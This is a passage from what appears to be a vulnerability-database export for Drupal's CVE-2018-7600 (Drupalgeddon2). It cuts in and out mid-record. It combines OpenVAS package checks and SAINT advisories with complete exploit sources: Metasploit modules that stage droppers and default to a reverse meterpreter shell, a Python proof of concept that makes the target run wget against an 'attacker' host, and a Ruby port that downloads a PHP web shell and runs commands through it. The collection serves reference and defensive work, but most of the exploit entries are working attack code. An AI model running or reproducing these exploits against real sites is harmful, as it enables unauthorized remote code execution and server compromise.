script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-12T00:00:00", "id": "OPENVAS:1361412562310874422", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874422", "title": "Fedora Update for drupal8 FEDORA-2018-1ba93b3144", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_1ba93b3144_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-1ba93b3144\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874422\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:57 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-1ba93b3144\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-1ba93b3144\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L2NHXS355OJ7C7ZEAGKMOPFWU6SUYYUV\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-04-27T01:05:58", "bulletinFamily": "exploit", "description": "", "modified": "2018-04-26T00:00:00", "published": "2018-04-26T00:00:00", "href": "https://packetstormsecurity.com/files/147392/Drupal-Drupalgeddon-2-Forms-API-Property-Injection.html", "id": "PACKETSTORM:147392", "title": "Drupal Drupalgeddon 2 Forms API Property Injection", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n# XXX: CmdStager can't handle badchars \ninclude Msf::Exploit::PhpEXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection', \n'Description' => %q{ \nThis module exploits a Drupal property injection in the Forms API. \n \nDrupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable. \n}, \n'Author' => [ \n'Jasper Mattsson', # Vulnerability discovery \n'a2u', # Proof of concept (Drupal 8.x) \n'Nixawk', # Proof of concept (Drupal 8.x) \n'FireFart', # Proof of concept (Drupal 7.x) \n'wvu' # Metasploit module \n], \n'References' => [ \n['CVE', '2018-7600'], \n['URL', 'https://www.drupal.org/sa-core-2018-002'], \n['URL', 'https://greysec.net/showthread.php?tid=2912'], \n['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'], \n['URL', 'https://github.com/a2u/CVE-2018-7600'], \n['URL', 'https://github.com/nixawk/labs/issues/19'], \n['URL', 'https://github.com/FireFart/CVE-2018-7600'], \n['AKA', 'SA-CORE-2018-002'], \n['AKA', 'Drupalgeddon 2'] \n], \n'DisclosureDate' => 'Mar 28 2018', \n'License' => MSF_LICENSE, \n'Platform' => ['php', 'unix', 'linux'], \n'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Payload' => {'BadChars' => '&>\\''}, \n# XXX: Using \"x\" in Gem::Version::new isn't technically appropriate \n'Targets' => [ \n# \n# Automatic targets (PHP, cmd/unix, native) \n# \n['Automatic (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Type' => :php_memory \n], \n['Automatic (PHP Dropper)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Type' => :php_dropper \n], \n['Automatic (Unix In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_memory \n], \n['Automatic (Linux Dropper)', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n], \n# \n# Drupal 7.x targets (PHP, cmd/unix, native) \n# \n['Drupal 7.x (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('7.x'), \n'Type' => :php_memory \n], \n['Drupal 7.x (PHP Dropper)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('7.x'), \n'Type' => :php_dropper \n], \n['Drupal 7.x (Unix In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Version' => Gem::Version.new('7.x'), \n'Type' => :unix_memory \n], \n['Drupal 7.x (Linux Dropper)', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Version' => Gem::Version.new('7.x'), \n'Type' => :linux_dropper \n], \n# \n# Drupal 8.x targets (PHP, cmd/unix, native) \n# \n['Drupal 8.x (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('8.x'), \n'Type' => :php_memory \n], \n['Drupal 8.x (PHP Dropper)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('8.x'), \n'Type' => :php_dropper \n], \n['Drupal 8.x (Unix In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Version' => Gem::Version.new('8.x'), \n'Type' => :unix_memory \n], \n['Drupal 8.x (Linux Dropper)', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Version' => Gem::Version.new('8.x'), \n'Type' => :linux_dropper \n] \n], \n'DefaultTarget' => 0, # Automatic (PHP In-Memory) \n'DefaultOptions' => {'WfsDelay' => 2} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path to Drupal install', '/']), \nOptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']), \nOptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false]) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp']) \n]) \nend \n \ndef check \ncheckcode = CheckCode::Safe \n \nif drupal_version \nprint_status(\"Drupal #{@version} targeted at #{full_uri}\") \ncheckcode = CheckCode::Detected \nelse \nprint_error('Could not determine Drupal version to target') \nreturn CheckCode::Unknown \nend \n \nif drupal_unpatched? \nprint_good('Drupal appears unpatched in CHANGELOG.txt') \ncheckcode = CheckCode::Appears \nend \n \ntoken = random_crap \nres = execute_command(token, func: 'printf') \n \nif res && res.body.start_with?(token) \ncheckcode = CheckCode::Vulnerable \nend \n \ncheckcode \nend \n \ndef exploit \nunless check == CheckCode::Vulnerable || datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'Set ForceExploit to override') \nend \n \nif datastore['PAYLOAD'] == 'cmd/unix/generic' \nprint_warning('Enabling DUMP_OUTPUT for cmd/unix/generic') \n# XXX: Naughty datastore modification \ndatastore['DUMP_OUTPUT'] = true \nend \n \n# NOTE: assert() is attempted first, then PHP_FUNC if that fails \ncase target['Type'] \nwhen :php_memory \nexecute_command(payload.encoded, func: 'assert') \n \nsleep(wfs_delay) \nreturn if session_created? \n \n# XXX: This will spawn a *very* obvious process \nexecute_command(\"php -r '#{payload.encoded}'\") \nwhen :unix_memory \nexecute_command(payload.encoded) \nwhen :php_dropper, :linux_dropper \ndropper_assert \n \nsleep(wfs_delay) \nreturn if session_created? \n \ndropper_exec \nend \nend \n \ndef dropper_assert \nphp_file = Pathname.new( \n\"#{datastore['WritableDir']}/#{random_crap}.php\" \n).cleanpath \n \n# Return the PHP payload or a PHP binary dropper \ndropper = get_write_exec_payload( \nwritable_path: datastore['WritableDir'], \nunlink_self: true # Worth a shot \n) \n \n# Encode away potential badchars with Base64 \ndropper = Rex::Text.encode_base64(dropper) \n \n# Stage 1 decodes the PHP and writes it to disk \nstage1 = %Q{ \nfile_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\")); \n} \n \n# Stage 2 executes said PHP in-process \nstage2 = %Q{ \ninclude_once(\"#{php_file}\"); \n} \n \n# :unlink_self may not work, so let's make sure \nregister_file_for_cleanup(php_file) \n \n# Hopefully pop our shell with assert() \nexecute_command(stage1.strip, func: 'assert') \nexecute_command(stage2.strip, func: 'assert') \nend \n \ndef dropper_exec \nphp_file = \"#{random_crap}.php\" \ntmp_file = Pathname.new( \n\"#{datastore['WritableDir']}/#{php_file}\" \n).cleanpath \n \n# Return the PHP payload or a PHP binary dropper \ndropper = get_write_exec_payload( \nwritable_path: datastore['WritableDir'], \nunlink_self: true # Worth a shot \n) \n \n# Encode away potential badchars with Base64 \ndropper = Rex::Text.encode_base64(dropper) \n \n# :unlink_self may not work, so let's make sure \nregister_file_for_cleanup(php_file) \n \n# Write the payload or dropper to disk (!) \n# NOTE: Analysis indicates > is a badchar for 8.x \nexecute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\") \n \n# Attempt in-process execution of our PHP script \nsend_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, php_file) \n) \n \nsleep(wfs_delay) \nreturn if session_created? \n \n# Try to get a shell with PHP CLI \nexecute_command(\"php #{php_file}\") \n \nsleep(wfs_delay) \nreturn if session_created? \n \nregister_file_for_cleanup(tmp_file) \n \n# Fall back on our temp file \nexecute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\") \nexecute_command(\"php #{tmp_file}\") \nend \n \ndef execute_command(cmd, opts = {}) \nfunc = opts[:func] || datastore['PHP_FUNC'] || 'passthru' \n \nvprint_status(\"Executing with #{func}(): #{cmd}\") \n \nres = \ncase @version.to_s \nwhen '7.x' \nexploit_drupal7(func, cmd) \nwhen '8.x' \nexploit_drupal8(func, cmd) \nend \n \nif res && res.code != 200 \nprint_error(\"Unexpected reply: #{res.inspect}\") \nreturn \nend \n \nif res && datastore['DUMP_OUTPUT'] \nprint_line(res.body) \nend \n \nres \nend \n \ndef drupal_version \nif target['Version'] \n@version = target['Version'] \nreturn @version \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => target_uri.path \n) \n \nreturn unless res && res.code == 200 \n \n# Check for an X-Generator header \n@version = \ncase res.headers['X-Generator'] \nwhen /Drupal 7/ \nGem::Version.new('7.x') \nwhen /Drupal 8/ \nGem::Version.new('8.x') \nend \n \nreturn @version if @version \n \n# Check for a <meta> tag \ngenerator = res.get_html_document.at( \n'//meta[@name = \"Generator\"]/@content' \n) \n \nreturn unless generator \n \n@version = \ncase generator.value \nwhen /Drupal 7/ \nGem::Version.new('7.x') \nwhen /Drupal 8/ \nGem::Version.new('8.x') \nend \nend \n \ndef drupal_unpatched? \nunpatched = true \n \n# Check for patch level in CHANGELOG.txt \nuri = \ncase @version.to_s \nwhen '7.x' \nnormalize_uri(target_uri.path, 'CHANGELOG.txt') \nwhen '8.x' \nnormalize_uri(target_uri.path, 'core/CHANGELOG.txt') \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => uri \n) \n \nreturn unless res && res.code == 200 \n \nif res.body.include?('SA-CORE-2018-002') \nunpatched = false \nend \n \nunpatched \nend \n \ndef exploit_drupal7(func, code) \nvars_get = { \n'q' => 'user/password', \n'name[#post_render][]' => func, \n'name[#markup]' => code, \n'name[#type]' => 'markup' \n} \n \nvars_post = { \n'form_id' => 'user_pass', \n'_triggering_element_name' => 'name' \n} \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => target_uri.path, \n'vars_get' => vars_get, \n'vars_post' => vars_post \n) \n \nreturn res unless res && res.code == 200 \n \nform_build_id = res.get_html_document.at( \n'//input[@name = \"form_build_id\"]/@value' \n) \n \nreturn res unless form_build_id \n \nvars_get = { \n'q' => \"file/ajax/name/#value/#{form_build_id.value}\" \n} \n \nvars_post = { \n'form_build_id' => form_build_id.value \n} \n \nsend_request_cgi( \n'method' => 'POST', \n'uri' => target_uri.path, \n'vars_get' => vars_get, \n'vars_post' => vars_post \n) \nend \n \ndef exploit_drupal8(func, code) \n# Clean URLs are enabled by default and \"can't\" be disabled \nuri = normalize_uri(target_uri.path, 'user/register') \n \nvars_get = { \n'element_parents' => 'account/mail/#value', \n'ajax_form' => 1, \n'_wrapper_format' => 'drupal_ajax' \n} \n \nvars_post = { \n'form_id' => 'user_register_form', \n'_drupal_ajax' => 1, \n'mail[#type]' => 'markup', \n'mail[#post_render][]' => func, \n'mail[#markup]' => code \n} \n \nsend_request_cgi( \n'method' => 'POST', \n'uri' => uri, \n'vars_get' => vars_get, \n'vars_post' => vars_post \n) \nend \n \ndef random_crap \nRex::Text.rand_text_alphanumeric(8..42) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/147392/drupal_drupalgeddon2.rb.txt"}, {"lastseen": "2018-04-19T09:07:42", "bulletinFamily": "exploit", "description": "", "modified": "2018-04-17T00:00:00", "published": "2018-04-17T00:00:00", "href": "https://packetstormsecurity.com/files/147247/Drupalgeddon2-Drupal-Remote-Code-Execution.html", "id": "PACKETSTORM:147247", "title": "Drupalgeddon2 Drupal Remote Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Drupalgeddon2', \n'Description' => %q{ \nCVE-2018-7600 / SA-CORE-2018-002 \nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 \nallows remote attackers to execute arbitrary code because of an issue affecting \nmultiple subsystems with default or common module configurations. \n \nThe module can load msf PHP arch payloads, using the php/base64 encoder. \n \nThe resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Vitalii Rudnykh', # initial PoC \n'Hans Topo', # further research and ruby port \n'JosA(c) Ignacio Rojo' # further research and msf module \n], \n'References' => \n[ \n['SA-CORE', '2018-002'], \n['CVE', '2018-7600'], \n], \n'DefaultOptions' => \n{ \n'encoder' => 'php/base64', \n'payload' => 'php/meterpreter/reverse_tcp', \n}, \n'Privileged' => false, \n'Platform' => ['php'], \n'Arch' => [ARCH_PHP], \n'Targets' => \n[ \n['User register form with exec', {}], \n], \n'DisclosureDate' => 'Apr 15 2018', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']), \n]) \n \nregister_advanced_options( \n[ \n \n]) \nend \n \ndef uri_path \nnormalize_uri(target_uri.path) \nend \n \ndef exploit_user_register \ndata = Rex::MIME::Message.new \ndata.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"') \ndata.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"') \ndata.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"') \ndata.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"') \ndata.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"') \npost_data = data.to_s \n \n# /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri_path}user/register\", \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => post_data, \n'vars_get' => { \n'element_parents' => 'account/mail/#value', \n'ajax_form' => '1', \n'_wrapper_format' => 'drupal_ajax', \n} \n}) \nend \n \n## \n# Main \n## \n \ndef exploit \ncase datastore['TARGET'] \nwhen 0 \nexploit_user_register \nelse \nfail_with(Failure::BadConfig, \"Invalid target selected.\") \nend \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147247/drupalgeddon2-exec.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-14T02:40:10", "bulletinFamily": "exploit", "description": "", "modified": "2018-04-13T00:00:00", "published": "2018-04-13T00:00:00", "href": "https://packetstormsecurity.com/files/147181/Drupal-Drupalgeddon2-Remote-Code-Execution.html", "id": "PACKETSTORM:147181", "type": "packetstorm", "title": "Drupal Drupalgeddon2 Remote Code Execution", "sourceData": "`#!/usr/bin/env \nimport sys \nimport requests \n \nprint ('################################################################') \nprint ('# Proof-Of-Concept for CVE-2018-7600') \nprint ('# by Vitalii Rudnykh') \nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') \nprint ('# https://github.com/a2u/CVE-2018-7600') \nprint ('################################################################') \nprint ('Provided only for educational or information purposes\\n') \n \ntarget = raw_input('Enter target url (example: https://domain.ltd/): ') \n \nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} \n \nr = requests.post(url, data=payload) \nif r.status_code != 200: \nsys.exit(\"Not exploitable\") \nprint ('\\nCheck: '+target+'hello.txt') \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147181/drupalgeddon2poc-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-14T02:40:10", "bulletinFamily": "exploit", "description": "", "modified": "2018-04-13T00:00:00", "published": "2018-04-13T00:00:00", "href": "https://packetstormsecurity.com/files/147182/Drupal-Drupalgeddon2-Remote-Code-Execution-Ruby-Port.html", "id": "PACKETSTORM:147182", "type": "packetstorm", "title": "Drupal Drupalgeddon2 Remote Code Execution Ruby Port", "sourceData": "`require 'net/http' \n \n# Hans Topo ruby port from Drupalggedon2 exploit. \n# Based on Vitalii Rudnykh exploit \n \ntarget = ARGV[0] \ncommand = ARGV[1] \n \nurl = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \n \nshell = \"<?php system($_GET['cmd']); ?>\" \n \npayload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' \n \nuri = URI(url) \n \nhttp = Net::HTTP.new(uri.host,uri.port) \n \nif uri.scheme == 'https' \nhttp.use_ssl = true \nhttp.verify_mode = OpenSSL::SSL::VERIFY_NONE \nend \n \nreq = Net::HTTP::Post.new(uri.path) \nreq.body = payload \n \nresponse = http.request(req) \n \nif response.code != \"200\" \nputs \"[*] Response: \" + response.code \nputs \"[*] Target seems not to be exploitable\" \nexit \nend \n \nputs \"[*] Target seems to be exploitable.\" \n \nexploit_uri = URI(target+\"/sh.php?cmd=#{command}\") \nresponse = Net::HTTP.get_response(exploit_uri) \nputs response.body \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147182/drupalgeddon2poc2-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "saint": [{"lastseen": "2019-05-29T19:19:24", "bulletinFamily": "exploit", "description": "Added: 04/25/2018 \nCVE: [CVE-2018-7600](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>) \nBID: [103534](<http://www.securityfocus.com/bid/103534>) \n\n\n### Background\n\n[Drupal](<https://www.drupal.org/>) is an open-source content management system written in PHP. \n\n### Problem\n\nInsufficient sanitization on Form API AJAX requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<https://www.drupal.org/download>) to Drupal 7.58, 8.3.9, 8.4.6, 8.5.1, or higher. \n\n### References\n\n<https://www.drupal.org/sa-core-2018-002> \n<https://research.checkpoint.com/uncovering-drupalgeddon-2/> \n\n\n### Limitations\n\nExploit works on Drupal 8.x running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2018-04-25T00:00:00", "published": "2018-04-25T00:00:00", "id": "SAINT:E218D6FA073276BB012BADF2CCE50F0E", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/drupal_form_api", "title": "Drupal Form API command execution", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "description": "Added: 04/25/2018 \nCVE: [CVE-2018-7600](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>) \nBID: [103534](<http://www.securityfocus.com/bid/103534>) \n\n\n### Background\n\n[Drupal](<https://www.drupal.org/>) is an open-source content management system written in PHP. \n\n### Problem\n\nInsufficient sanitization on Form API AJAX requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<https://www.drupal.org/download>) to Drupal 7.58, 8.3.9, 8.4.6, 8.5.1, or higher. \n\n### References\n\n<https://www.drupal.org/sa-core-2018-002> \n<https://research.checkpoint.com/uncovering-drupalgeddon-2/> \n\n\n### Limitations\n\nExploit works on Drupal 8.x running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2018-04-25T00:00:00", "published": "2018-04-25T00:00:00", "id": "SAINT:420D07B85504086850EFAA31B8BCAEB5", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/drupal_form_api", "title": "Drupal Form API command execution", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "description": "Remote command execution vulnerability in Drupal core/lib/Drupal/Core/DrupalKernel.php\n\nVulnerability Type: Remote Command Execution", "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "E-638", "href": "", "type": "dsquare", "title": "Drupal 8 SA-CORE-2018-002 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "description": "Remote command execution vulnerability in Drupal core/lib/Drupal/Core/DrupalKernel.php\n\nVulnerability Type: Remote Command Execution", "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "E-639", "href": "", "type": "dsquare", "title": "Drupal 7 SA-CORE-2018-002 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-05-24T14:14:18", "bulletinFamily": "exploit", "description": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC). CVE-2018-7600. Webapps exploit for PHP platform", "modified": "2018-04-13T00:00:00", "published": "2018-04-13T00:00:00", "id": "EDB-ID:44448", "href": "https://www.exploit-db.com/exploits/44448/", "type": "exploitdb", "title": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)", "sourceData": "#!/usr/bin/env\r\nimport sys\r\nimport requests\r\n\r\nprint ('################################################################')\r\nprint ('# Proof-Of-Concept for CVE-2018-7600')\r\nprint ('# by Vitalii Rudnykh')\r\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\r\nprint ('# https://github.com/a2u/CVE-2018-7600')\r\nprint ('################################################################')\r\nprint ('Provided only for educational or information purposes\\n')\r\n\r\ntarget = input('Enter target url (example: https://domain.ltd/): ')\r\n\r\n# Add proxy support (eg. BURP to analyze HTTP(s) traffic)\r\n# set verify = False if your proxy certificate is self signed\r\n# remember to set proxies both for http and https\r\n# \r\n# example:\r\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\r\n# verify = False\r\nproxies = {}\r\nverify = True\r\n\r\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\r\n\r\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\r\ncheck = requests.get(target + 'hello.txt')\r\nif check.status_code != 200:\r\n sys.exit(\"Not exploitable\")\r\nprint ('\\nCheck: '+target+'hello.txt')", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44448/"}, {"lastseen": "2018-05-24T14:15:46", "bulletinFamily": "exploit", "description": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit). CVE-2018-7600. Remote exploit for PHP platform. Tags: Metas...", "modified": "2018-04-17T00:00:00", "published": "2018-04-17T00:00:00", "id": "EDB-ID:44482", "href": "https://www.exploit-db.com/exploits/44482/", "type": "exploitdb", "title": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon2',\r\n 'Description' => %q{\r\n CVE-2018-7600 / SA-CORE-2018-002\r\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\r\n allows remote attackers to execute arbitrary code because of an issue affecting\r\n multiple subsystems with default or common module configurations.\r\n\r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n\r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Vitalii Rudnykh', # initial PoC\r\n 'Hans Topo', # further research and ruby port\r\n 'Jos\u00c3\u00a9 Ignacio Rojo' # further research and msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-002'],\r\n ['CVE', '2018-7600'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => 